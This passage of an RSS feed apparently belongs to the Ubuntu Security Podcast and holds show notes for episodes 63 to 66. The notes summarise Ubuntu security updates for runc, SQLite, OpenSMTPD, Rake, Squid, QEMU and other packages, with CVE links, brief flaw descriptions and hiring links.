</li>
<li>Race condition on mounting of shared volume mounts between two
containers - can replace /proc on one container with a symlink inside of
the shared mount - when this gets cleaned up other parts of /proc can end
mounted within the shared mount and this could be used for privilege
escalation since if outside of /proc then regular users might be able to
write to sensitive parts of /proc - fixed by having runc validate that
the target for mounting /proc or /sys must either not exist or must be a
directory to avoid symlink attacks etc</li>
<li>Possible bypass of AppArmor restrictions since would not properly check
the target of a mount and so could end up mounting a malicious image over
/proc - instead add more explicit checks on whether the dest of a mount
is /proc and only allow this if the source is also a procfs</li>
</ul>
<h3 id="usn-4298-1-sqlite-vulnerabilities-03-09">[<a href="https://usn.ubuntu.com/4298-1/">USN-4298-1</a>] SQLite vulnerabilities [03:09]</h3>
<ul>
<li>13 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13752">CVE-2019-13752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9327">CVE-2020-9327</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20218">CVE-2019-20218</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19926">CVE-2019-19926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19959">CVE-2019-19959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19925">CVE-2019-19925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19924">CVE-2019-19924</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19923">CVE-2019-19923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19880">CVE-2019-19880</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13751">CVE-2019-13751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13753">CVE-2019-13753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13750">CVE-2019-13750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13734">CVE-2019-13734</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Many different memory safety issues resolved in SQLite - across various
parts of SQLite including handling of shadow tables, corrupt records,
parsing, ZIP archives and column optimisations. Most of these were
detected by fuzzing and so are unlikely to be an issue unless handling
untrusted SQLite databases or untrusted query inputs.</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-discuss-amd-take-a-way-attack-04-10">Alex and Joe discuss AMD Take A Way attack [04:10]</h3>
<ul>
<li><a href="https://www.zdnet.com/article/amd-processors-from-2011-to-2019-vulnerable-to-two-new-attacks/">https://www.zdnet.com/article/amd-processors-from-2011-to-2019-vulnerable-to-two-new-attacks/</a></li>
</ul>
<h3 id="blog-posts-19-08">Blog posts [19:08]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/on-boxing-tabletop-exercises-and-threat-models">https://ubuntu.com/blog/on-boxing-tabletop-exercises-and-threat-models</a></li>
<li><a href="https://ubuntu.com/blog/ros-development-with-lxd">https://ubuntu.com/blog/ros-development-with-lxd</a></li>
<li><a href="https://ubuntu.com/blog/ros-2-ci-with-github-actions">https://ubuntu.com/blog/ros-2-ci-with-github-actions</a></li>
</ul>
<h3 id="hiring-20-21">Hiring [20:21]</h3>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/1550997">https://canonical.com/careers/1550997</a></li>
</ul>
<h4 id="security-engineer-certifications--fips-common-criteria">Security Engineer - Certifications (FIPS, Common Criteria)</h4>
<ul>
<li><a href="https://canonical.com/careers/2085468">https://canonical.com/careers/2085468</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2085023">https://canonical.com/careers/2085023</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E066.mp3" length="20757225" type="audio/mpeg" /><itunes:duration>21:37</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 65
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-65/</link>
          <pubDate>Thu, 05 Mar 2020 14:35:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>ae3fd86077905ed6dee84fcdb19c70e71325cde5af0589489d2b4bfbc430c48aa2824bf583508258ead4cb25ccce9877fbf06f84aaa4d736005cc7c00c36d8f6</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 65</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Whilst avoiding Coronavirus, this week we look at updates for libarchive,
  OpenSMTPD, rake and more, plus Joe and Alex discuss ROS, the Robot
  Operating System and how the Ubuntu Security Team is involved in the
  ongoing development of...
        
        ]]></itunes:subtitle>
        <itunes:summary>  Whilst avoiding Coronavirus, this week we look at updates for libarchive,
  OpenSMTPD, rake and more, plus Joe and Alex discuss ROS, the Robot
  Operating System and how the Ubuntu Security Team is involved in the
  ongoing development of secure foundations for robotics.
  </itunes:summary>
        <description>  Whilst avoiding Coronavirus, this week we look at updates for libarchive,
  OpenSMTPD, rake and more, plus Joe and Alex discuss ROS, the Robot
  Operating System and how the Ubuntu Security Team is involved in the
  ongoing development of secure foundations for robotics.
  </description>
        <googleplay:description>  Whilst avoiding Coronavirus, this week we look at updates for libarchive,
  OpenSMTPD, rake and more, plus Joe and Alex discuss ROS, the Robot
  Operating System and how the Ubuntu Security Team is involved in the
  ongoing development of secure foundations for robotics.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Whilst avoiding Coronavirus, this week we look at updates for libarchive,
OpenSMTPD, rake and more, plus Joe and Alex discuss ROS, the Robot
Operating System and how the Ubuntu Security Team is involved in the
ongoing development of secure foundations for robotics.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>7 unique CVEs addressed</p>
<h3 id="usn-4293-1-libarchive-vulnerabilities-00-18">[<a href="https://usn.ubuntu.com/4293-1/">USN-4293-1</a>] libarchive vulnerabilities [00:18]</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-9308">CVE-2020-9308</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19221">CVE-2019-19221</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OSS-Fuzz: RAR unpacker would try and unpack a file with a corrupted /
malformed header (ie. zero length etc) - OOB read - crash/DoS</li>
<li>OOB read due to use of wrong length parameter to mbtowc()</li>
</ul>
<h3 id="usn-4294-1-opensmtpd-vulnerabilities-02-00">[<a href="https://usn.ubuntu.com/4294-1/">USN-4294-1</a>] OpenSMTPD vulnerabilities [02:00]</h3>
<ul>
<li>2 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8793">CVE-2020-8793</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8794">CVE-2020-8794</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Remote code exec on both clients <strong>and</strong> server (as server reuses client-side code for debouncing)</li>
<li>Possible arbitrary file read due to race-condition in offline
functionality - a user could create a hardlink to a root-owned file which
opensmtpd would then read - mitigated on Ubuntu since we enable
protected_hardlinks sysctl which stops regular users creating hardlinks
to root-owned files</li>
</ul>
<h3 id="usn-4288-2-ppp-vulnerability-03-12">[<a href="https://usn.ubuntu.com/4288-2/">USN-4288-2</a>] ppp vulnerability [03:12]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8597">CVE-2020-8597</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-64/">Episode 64</a> (possible buffer overflow)</li>
</ul>
<h3 id="usn-4290-2-libpam-radius-auth-vulnerability-03-23">[<a href="https://usn.ubuntu.com/4290-2/">USN-4290-2</a>] libpam-radius-auth vulnerability [03:23]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2015-9542">CVE-2015-9542</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-64/">Episode 64</a> (stack overflow in password field handling)</li>
</ul>
<h3 id="usn-4295-1-rake-vulnerability-03-31">[<a href="https://usn.ubuntu.com/4295-1/">USN-4295-1</a>] Rake vulnerability [03:31]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8130">CVE-2020-8130</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Command injection vulnerability via Rake::FileList - used the Kernel
open() method rather than File.open() - this supports launching a process
if the file-name starts with a pipe `|` - so instead just use File.open()</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-discuss-ros-the-robot-operating-system-04-28">Joe and Alex discuss ROS, the Robot Operating System [04:28]</h3>
<h4 id="kyle-fazzari-s-ros-and-ubuntu-video-series">Kyle Fazzari&rsquo;s ROS and Ubuntu Video Series</h4>
<ul>
<li><a href="https://ubuntu.com/blog/from-ros-prototype-to-production-on-ubuntu-core">https://ubuntu.com/blog/from-ros-prototype-to-production-on-ubuntu-core</a></li>
<li><a href="https://ubuntu.com/blog/your-first-robot-a-beginners-guide-to-ros-and-ubuntu-core-1-5">https://ubuntu.com/blog/your-first-robot-a-beginners-guide-to-ros-and-ubuntu-core-1-5</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/1550997">https://canonical.com/careers/1550997</a></li>
</ul>
<h4 id="security-engineer-certifications--fips-common-criteria">Security Engineer - Certifications (FIPS, Common Criteria)</h4>
<ul>
<li><a href="https://canonical.com/careers/2085468">https://canonical.com/careers/2085468</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2085023">https://canonical.com/careers/2085023</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E065.mp3" length="21871516" type="audio/mpeg" /><itunes:duration>22:46</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 64
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-64/</link>
          <pubDate>Thu, 27 Feb 2020 22:01:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>c706dda9eb6c395624a28a4f83cb71742f753e95b91b85208b207bf2c164f29301c2bd4caec2157c09758119db4f1de9118be3b5d9706aa0a2e65b04adf9401d</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 64</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at security updates for ppp, Squid, rsync + more, and Joe
  and Alex discuss the wide scope of the Ubuntu Security Team including some
  current open positions.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at security updates for ppp, Squid, rsync + more, and Joe
  and Alex discuss the wide scope of the Ubuntu Security Team including some
  current open positions.
  </itunes:summary>
        <description>  This week we look at security updates for ppp, Squid, rsync + more, and Joe
  and Alex discuss the wide scope of the Ubuntu Security Team including some
  current open positions.
  </description>
        <googleplay:description>  This week we look at security updates for ppp, Squid, rsync + more, and Joe
  and Alex discuss the wide scope of the Ubuntu Security Team including some
  current open positions.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at security updates for ppp, Squid, rsync + more, and Joe
and Alex discuss the wide scope of the Ubuntu Security Team including some
current open positions.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>19 unique CVEs addressed</p>
<h3 id="lsn-0063-1-linux-kernel-vulnerability-00-43">[<a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-February/005341.html">LSN-0063-1</a>] Linux kernel vulnerability [00:43]</h3>
<ul>
<li>5 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7053">CVE-2020-7053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20096">CVE-2019-20096</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19050">CVE-2019-19050</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14615">CVE-2019-14615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5108">CVE-2019-5108</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>i915 UAF (<a href="https://ubuntusecuritypodcast.org/episode-60/">Episode 60</a>), DCCP memory leak -&gt; DoS (<a href="https://ubuntusecuritypodcast.org/episode-63/">Episode 63</a>), crypto
subsystem memory leaks (<a href="https://ubuntusecuritypodcast.org/episode-60/">Episode 60</a>), i915 info leak (<a href="https://ubuntusecuritypodcast.org/episode-60/">Episode 60</a>, <a href="https://ubuntusecuritypodcast.org/episode-53/">Episode
53</a>), WiFi AP mode DoS (<a href="https://ubuntusecuritypodcast.org/episode-53/">Episode 53</a>)</li>
</ul>
<h3 id="usn-4279-2-php-regression-01-51">[<a href="https://usn.ubuntu.com/4279-2/">USN-4279-2</a>] PHP regression [01:51]</h3>
<ul>
<li>3 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7060">CVE-2020-7060</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7059">CVE-2020-7059</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2015-9253">CVE-2015-9253</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-63/">Episode 63</a> - Upstream fix for <a href="https://ubuntu.com/security/CVE-2015-9253">CVE-2015-9253</a> contained a memory leak -
this fix was backed-out in this update</li>
</ul>
<h3 id="usn-4288-1-ppp-vulnerability-02-16">[<a href="https://usn.ubuntu.com/4288-1/">USN-4288-1</a>] ppp vulnerability [02:16]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8597">CVE-2020-8597</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Included a check for possible buffer overflow a an rhostname but the
check was incorrect :( so could still overflow - fixed by making the
correct check</li>
</ul>
<h3 id="usn-4289-1-squid-vulnerabilities-02-41">[<a href="https://usn.ubuntu.com/4289-1/">USN-4289-1</a>] Squid vulnerabilities [02:41]</h3>
<ul>
<li>4 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8517">CVE-2020-8517</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8450">CVE-2020-8450</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8449">CVE-2020-8449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12528">CVE-2019-12528</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer overflow in NTLM credentials parser - out-of-process so would just
result in a DoS</li>
<li>Buffer overflow when acting as a reverse proxy</li>
<li>Incorrect input validation leading to access to server resources which
should have been prohibited</li>
<li>Info disclosure due to heap buffer over-read when acting as an FTP client
from a malicious FTP server</li>
</ul>
<h3 id="usn-4290-1-libpam-radius-auth-vulnerability-03-26">[<a href="https://usn.ubuntu.com/4290-1/">USN-4290-1</a>] libpam-radius-auth vulnerability [03:26]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2015-9542">CVE-2015-9542</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Stack overflow in password field handling -&gt; crash, DoS</li>
</ul>
<h3 id="usn-4291-1-mod-auth-mellon-vulnerability-03-49">[<a href="https://usn.ubuntu.com/4291-1/">USN-4291-1</a>] mod-auth-mellon vulnerability [03:49]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13038">CVE-2019-13038</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>SAML 2.0 authentication module for Apache</li>
<li>Open redirect - didn&rsquo;t properly validate the ReturnTo substring of the
login API endpoint - could allow to launch possible phishing attacks etc
by masquerading as another domain via the redirect</li>
</ul>
<h3 id="usn-4292-1-rsync-vulnerabilities-04-33">[<a href="https://usn.ubuntu.com/4292-1/">USN-4292-1</a>] rsync vulnerabilities [04:33]</h3>
<ul>
<li>4 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-9843">CVE-2016-9843</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9842">CVE-2016-9842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9841">CVE-2016-9841</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9840">CVE-2016-9840</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All issues with the vendored copy of zlib contained within rsync -
various low-level memory management issues (discussed back in <a href="https://ubuntusecuritypodcast.org/episode-60/">Episode 60</a>
in the context of zlib - as a result of a security audit a few years ago
by Trail of Bits )</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-discuss-the-larger-scope-of-the-ubuntu-security-team-and-current-open-positions-05-05">Alex and Joe discuss the larger scope of the Ubuntu Security Team and current open positions [05:05]</h3>
<h4 id="kyle-fazzari-s-ros-and-ubuntu-video-series">Kyle Fazzari&rsquo;s ROS and Ubuntu Video Series</h4>
<ul>
<li><a href="https://ubuntu.com/blog/from-ros-prototype-to-production-on-ubuntu-core">https://ubuntu.com/blog/from-ros-prototype-to-production-on-ubuntu-core</a></li>
<li><a href="https://ubuntu.com/blog/your-first-robot-a-beginners-guide-to-ros-and-ubuntu-core-1-5">https://ubuntu.com/blog/your-first-robot-a-beginners-guide-to-ros-and-ubuntu-core-1-5</a></li>
</ul>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/1550997">https://canonical.com/careers/1550997</a></li>
</ul>
<h4 id="security-engineer-certifications--fips-common-criteria">Security Engineer - Certifications (FIPS, Common Criteria)</h4>
<ul>
<li><a href="https://canonical.com/careers/2085468">https://canonical.com/careers/2085468</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2085023">https://canonical.com/careers/2085023</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E064.mp3" length="22494275" type="audio/mpeg" /><itunes:duration>23:25</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 63
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-63/</link>
          <pubDate>Thu, 20 Feb 2020 15:51:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>fbd2de403377ec5c3488d937ebbff935b1a9ed374a20c2404f6d69862b28a26e62003bcc630474425c1caa2382b0f0ada22a4cf2462cb3f34f43b32e424f2671</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 63</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Security updates for Firefox, QEMU, Linux kernel, ClamAV and more, plus we
  discuss our recommended reading list for getting into infosec and farewell
  long-time member of the Ubuntu Security Team / community Tyler Hicks.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Security updates for Firefox, QEMU, Linux kernel, ClamAV and more, plus we
  discuss our recommended reading list for getting into infosec and farewell
  long-time member of the Ubuntu Security Team / community Tyler Hicks.
  </itunes:summary>
        <description>  Security updates for Firefox, QEMU, Linux kernel, ClamAV and more, plus we
  discuss our recommended reading list for getting into infosec and farewell
  long-time member of the Ubuntu Security Team / community Tyler Hicks.
  </description>
        <googleplay:description>  Security updates for Firefox, QEMU, Linux kernel, ClamAV and more, plus we
  discuss our recommended reading list for getting into infosec and farewell
  long-time member of the Ubuntu Security Team / community Tyler Hicks.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Security updates for Firefox, QEMU, Linux kernel, ClamAV and more, plus we
discuss our recommended reading list for getting into infosec and farewell
long-time member of the Ubuntu Security Team / community Tyler Hicks.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>54 unique CVEs addressed</p>
<h3 id="usn-4278-1-firefox-vulnerabilities-00-55">[<a href="https://usn.ubuntu.com/4278-1/">USN-4278-1</a>] Firefox vulnerabilities [00:55]</h3>
<ul>
<li>4 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-6801">CVE-2020-6801</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6800">CVE-2020-6800</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6798">CVE-2020-6798</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6796">CVE-2020-6796</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Firefox 73.0
<ul>
<li>Various memory safety issues</li>
<li>Possible XSS if a site used a &lt;template&gt; tag within a &lt;select&gt; tag
since could allow subsequent JavaScript parsing and execution</li>
</ul>
</li>
</ul>
<h3 id="usn-4279-1-php-vulnerabilities-01-26">[<a href="https://usn.ubuntu.com/4279-1/">USN-4279-1</a>] PHP vulnerabilities [01:26]</h3>
<ul>
<li>3 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7060">CVE-2020-7060</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7059">CVE-2020-7059</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2015-9253">CVE-2015-9253</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer overread when converting multibyte characters via mbstring
functions and when reading data whilst stripping tags via fgetss() -
crash / info disc</li>
<li>Fix for a CPU and disk-based DoS when PHP FPM (FastCGI Process Manager)
would endlessly restart a child process - busy CPU loop and large error
logs -&gt; DoS</li>
</ul>
<h3 id="usn-4280-1-usn-4280-2-clamav-vulnerability-02-27">[<a href="https://usn.ubuntu.com/4280-1/">USN-4280-1</a>, <a href="https://usn.ubuntu.com/4280-2/">USN-4280-2</a>] ClamAV vulnerability [02:27]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-3123">CVE-2020-3123</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read in Data-Loss-Prevention (DLP) module (scans for CC or social
security numbers) - crafted email would cause OOB read -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-4281-1-webkitgtk-plus-vulnerabilities-03-04">[<a href="https://usn.ubuntu.com/4281-1/">USN-4281-1</a>] WebKitGTK+ vulnerabilities [03:04]</h3>
<ul>
<li>5 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-3868">CVE-2020-3868</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3867">CVE-2020-3867</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3865">CVE-2020-3865</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3864">CVE-2020-3864</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3862">CVE-2020-3862</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various issues able to be triggered by malicious websites
<ul>
<li>DoS via poor memory handling</li>
<li>Wrong secrity origin for particular DOM objects</li>
<li>Top-level DOM object incorrectly considered secure</li>
<li>Logic issue leading to a universal XSS flaw</li>
<li>Poor memory handling leading to RCE</li>
</ul>
</li>
</ul>
<h3 id="usn-4282-1-postgresql-vulnerability-03-50">[<a href="https://usn.ubuntu.com/4282-1/">USN-4282-1</a>] PostgreSQL vulnerability [03:50]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1720">CVE-2020-1720</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Missing authorization checks on ALTER &hellip; DEPENDS ON EXTENSION
sub-commands - could allow unprivileged users to drop any function,
procedure, index etc under certain conditions</li>
</ul>
<h3 id="usn-4283-1-qemu-vulnerabilities-04-10">[<a href="https://usn.ubuntu.com/4283-1/">USN-4283-1</a>] QEMU vulnerabilities [04:10]</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8608">CVE-2020-8608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7039">CVE-2020-7039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-1711">CVE-2020-1711</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer overflow in libslirp tcp emulation due to misuse of snprintf()
return value - assumed snprintf() returns the number of bytes written -
BUT returns the number of bytes which would have been written if the dest
buffer was big enough - so if buffer is too small then returns a value
larger than the buffer - so if that returned size is used later in a
memcpy() or similar would overflow the buffer - so instead need to
carefully track the return value if it is larger than the dest buffer</li>
<li>Separate buffer overflow in libslirp tcp emulation code due to missing
size checks</li>
<li>Heap buffer OOB write in iSCSI block driver - malicious iSCSI server
could trigger this and crash or possibly get code execution on QEMU host</li>
</ul>
<h3 id="usn-4284-1-linux-kernel-vulnerabilities-05-21">[<a href="https://usn.ubuntu.com/4284-1/">USN-4284-1</a>] Linux kernel vulnerabilities [05:21]</h3>
<ul>
<li>23 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15291">CVE-2019-15291</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19965">CVE-2019-19965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19947">CVE-2019-19947</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19767">CVE-2019-19767</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19602">CVE-2019-19602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19332">CVE-2019-19332</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19252">CVE-2019-19252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19241">CVE-2019-19241</a> <!-- raw HTML omitted --></li>
